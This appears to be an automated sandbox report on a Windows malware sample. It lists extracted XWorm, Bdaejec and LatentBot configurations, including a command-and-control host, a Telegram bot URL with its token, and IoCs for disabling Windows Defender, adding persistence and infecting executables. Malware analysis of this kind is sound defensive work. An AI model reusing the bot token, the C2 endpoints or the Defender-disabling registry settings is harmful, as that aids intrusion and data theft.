Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
20/05/2025, 00:46
Static task
static1
Behavioral task
behavioral1
Sample
250519-z3llfszks4.exe
Resource
win10v2004-20250502-en
General
-
Target
250519-z3llfszks4.exe
-
Size
285KB
-
MD5
20841606ce69632f258221219aeee09b
-
SHA1
b72918797186774598792c47b66d5857be59f576
-
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
-
SHA512
aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
-
SSDEEP
6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted
xworm
3.1
grayhatgroupontop.zapto.org:1177
-
Install_directory
%AppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
bdaejec
ddos.dnsnb8.net
Extracted
latentbot
grayhatgroupontop.zapto.org
Signatures
-
Bdaejec family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x001000000002372e-71.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000022532-22.dat family_xworm behavioral1/memory/4600-25-0x0000000000DA0000-0x0000000000DB8000-memory.dmp family_xworm -
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral1/memory/4648-100-0x00000000005D0000-0x00000000005D9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2516-533-0x0000000000CD0000-0x0000000000CD9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/4648-547-0x00000000005D0000-0x00000000005D9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/2516-1476-0x0000000000CD0000-0x0000000000CD9000-memory.dmp family_bdaejec_backdoor behavioral1/memory/4648-1477-0x00000000005D0000-0x00000000005D9000-memory.dmp family_bdaejec_backdoor -
Latentbot family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1408 created 616 1408 powershell.EXE 5 -
Xworm family
-
pid Process 5024 powershell.exe 3100 powershell.exe 400 powershell.exe 3336 powershell.exe 6112 powershell.exe 5724 powershell.exe 4836 powershell.exe 3336 powershell.exe 2032 powershell.exe 3672 powershell.exe 1048 powershell.exe 6088 powershell.exe 1404 powershell.exe 5832 powershell.exe 2256 powershell.exe 3156 powershell.exe 4136 powershell.exe 5792 powershell.exe 3900 powershell.exe 6096 powershell.exe 1220 powershell.exe 4152 powershell.exe 3068 powershell.exe 5036 powershell.exe 1408 powershell.EXE 1628 powershell.exe 3924 powershell.exe 3064 powershell.exe 5620 powershell.exe 3916 powershell.exe 4816 powershell.exe 556 powershell.exe 2116 powershell.exe 4224 powershell.exe 4612 powershell.exe 1628 powershell.exe 1460 powershell.exe 4484 powershell.exe 3244 powershell.exe 228 powershell.exe 4604 powershell.exe 1180 powershell.exe 4424 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1876 netsh.exe 3412 netsh.exe -
resource yara_rule behavioral1/files/0x00070000000227c4-62.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation izTLZKj.exe Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation iyMbXS.exe Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation 250519-z3llfszks4.exe Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe -
Executes dropped EXE 11 IoCs
pid Process 4600 x69.exe 5488 x69.exe 1640 x69Disable-winDefender.exe 2236 x69Disable-winDefender.exe 2516 izTLZKj.exe 2916 x69install.exe 4648 iyMbXS.exe 5056 x69install.exe 5336 x69.exe 1560 x69.exe 2392 x69.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" 250519-z3llfszks4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" 250519-z3llfszks4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" 250519-z3llfszks4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 ip-api.com -
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1408 set thread context of 1584 1408 powershell.EXE 243 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoasb.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ssvagent.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxTsr.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\YourPhone.exe iyMbXS.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\TCUI-App.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\orbd.exe izTLZKj.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe izTLZKj.exe File opened for modification C:\Program Files\dotnet\dotnet.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe izTLZKj.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe iyMbXS.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\os_update_handler.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\StoreExperienceHost.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.Brokered.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\7zG.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe izTLZKj.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmid.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msotd.exe iyMbXS.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\nmhproxy.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe izTLZKj.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\codecpacks.heif.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE iyMbXS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyMbXS.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 60 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747702101" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 May 2025 00:48:21 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key 